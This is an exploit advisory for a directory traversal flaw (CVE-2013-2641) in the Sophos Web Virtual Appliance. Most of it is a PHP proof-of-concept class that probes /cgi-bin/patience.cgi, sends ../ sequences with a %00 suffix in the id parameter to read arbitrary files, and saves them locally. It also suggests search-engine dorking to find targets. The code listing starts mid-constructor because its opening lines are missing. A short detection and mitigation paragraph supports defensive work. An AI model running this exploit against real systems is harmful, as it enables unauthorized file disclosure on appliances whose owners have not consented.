=============================================================================================================================================
| # Title : Sophos Web Virtual Appliance v3.7.0 Directory Traversal Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.sophos.com/en-us/support/downloads/virtual-web-appliance |
=============================================================================================================================================
POC :
[+] Dorking in Google or other search engine.
[+] Code Description: This code allows you to exploit the directory traversal vulnerability in the Sophos Web Protection Appliance to retrieve any file from the system. The id parameter of /cgi-bin/patience.cgi is filled with a run of ../ segments, the requested file path and a %00 suffix, which is the usual way a path escapes the directory a script is meant to read from. cURL was used to execute HTTP requests, and the response was handled to verify the success of the attack and save the retrieved content to a local file. (Related : https://packetstorm.news/files/id/180832/ Linked CVE numbers: CVE-2013-2641 ) .
[+] Detection and mitigation: requests to /cgi-bin/patience.cgi whose id parameter contains ../ sequences or %00, raw or percent-encoded, are the indicator to search for in the appliance's web logs or at an upstream proxy. Apply the vendor's fixed release for CVE-2013-2641 and keep the appliance's web interface unreachable from untrusted networks.
[+] save code as poc.php.
[+] Set target : line 84
[+] PayLoad : (the listing below starts mid-constructor on this page; its opening lines were lost in extraction)
target = $target; $this->port = $port; $this->filepath = $filepath; $this->depth = $depth; } private function my_basename($filename) { return basename(str_replace('\\', '/', $filename)); } private function is_proficy() { $url = "https://{$this->target}:{$this->port}/cgi-bin/patience.cgi"; $response = $this->send_request($url); if ($response && strpos($response['body'], 'The patience page request was not valid') !== false) { return true; } return false; } private function read_file() { $traversal_path = str_repeat('../', $this->depth) . $this->filepath . "%00"; echo "Retrieving file contents...\n"; $url = "https://{$this->target}:{$this->port}/cgi-bin/patience.cgi?id=" . 
urlencode($traversal_path); $response = $this->send_request($url); if ($response && ($response['code'] == 200 || $response['code'] == 500) && isset($response['headers']['X-Sophos-PatienceID'])) { return $response['body']; } else { echo "Error: " . $response['code'] . "\n" . $response['body'] . "\n"; return null; } } private function send_request($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); $body = curl_exec($ch); $code = curl_getinfo($ch, CURLINFO_HTTP_CODE); $headers = curl_getinfo($ch); curl_close($ch); return ['code' => $code, 'body' => $body, 'headers' => $headers]; } public function run() { echo "Checking if it's a Sophos Web Protect Appliance with the vulnerable component...\n"; if ($this->is_proficy()) { echo "Check successful\n"; } else { echo "Sophos Web Protect Appliance vulnerable component not found\n"; return; } $contents = $this->read_file(); if ($contents === null) { echo "File not downloaded\n"; return; } $file_name = $this->my_basename($this->filepath); file_put_contents($file_name, $contents); echo "File saved as: " . $file_name . "\n"; } } $exploit = new SophosTraversalExploit('target.com'); $exploit->run(); Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================